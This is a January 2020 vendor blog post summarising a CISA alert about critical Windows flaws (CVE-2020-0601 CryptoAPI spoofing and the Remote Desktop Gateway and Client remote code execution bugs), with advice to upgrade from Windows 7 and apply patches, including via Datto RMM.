January 16, 2020
CISA Issues Alert Over Windows Vulnerability
The push to Windows 10 has not gone one without snags. With Microsoft’s Windows 7 end of life official arrival on 1/14, recent reports about vulnerabilities in Windows are less than ideal.
The Cybersecurity and Infrastructure Security Agency (CISA) has released an alert regarding critical vulnerabilities in the Windows OS addressed in a recent patch.
On January 14, 2020, Microsoft released software fixes to address 49 vulnerabilities as part of their monthly Patch Tuesday announcement. Among the vulnerabilities patched were critical weaknesses in Windows CryptoAPI, Windows Remote Desktop Gateway (RD Gateway), and Windows Remote Desktop Client. An attacker could remotely exploit these vulnerabilities to decrypt, modify, or inject data on user connections:
- CryptoAPI spoofing vulnerability – CVE-2020-0601: This vulnerability affects all machines running 32- or 64-bit Windows 10 operating systems, including Windows Server versions 2016 and 2019. This vulnerability allows Elliptic Curve Cryptography (ECC) certificate validation to bypass the trust store, enabling unwanted or malicious software to masquerade as authentically signed by a trusted or trustworthy organization. This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.
- Windows RD Gateway and Windows Remote Desktop Client vulnerabilities – CVE-2020-0609, CVE-2020-0610, and CVE-2020-0611: These vulnerabilities affect Windows Server 2012 and newer. In addition, CVE-2020-0611 affects Windows 7 and newer. These vulnerabilities—in the Windows Remote Desktop Client and RD Gateway Server—allow for remote code execution, where arbitrary code could be run freely. The server vulnerabilities do not require authentication or user interaction and can be exploited by a specially crafted request. The client vulnerability can be exploited by convincing a user to connect to a malicious server.
First and foremost, MSPs and users should ensure they have upgraded from Windows 7 and Server 2008, as these systems will not be eligible to receive any further security updates, leaving them vulnerable to exploits and becoming a liability to the business. Operating systems that are supported, such as Windows 10, should apply the critical patches referenced in the CISA alert immediately, especially for mission-critical systems and network-connected servers.
Windows 10 patching is automated by default, but various factors, including planned delays, may result in unintended exposure. MSPs using Datto RMM are able to easily and accurately identify exposed devices by searching for those missing the respective patch KB number of the operating system, and then enforce an immediate update to eliminate the vulnerability.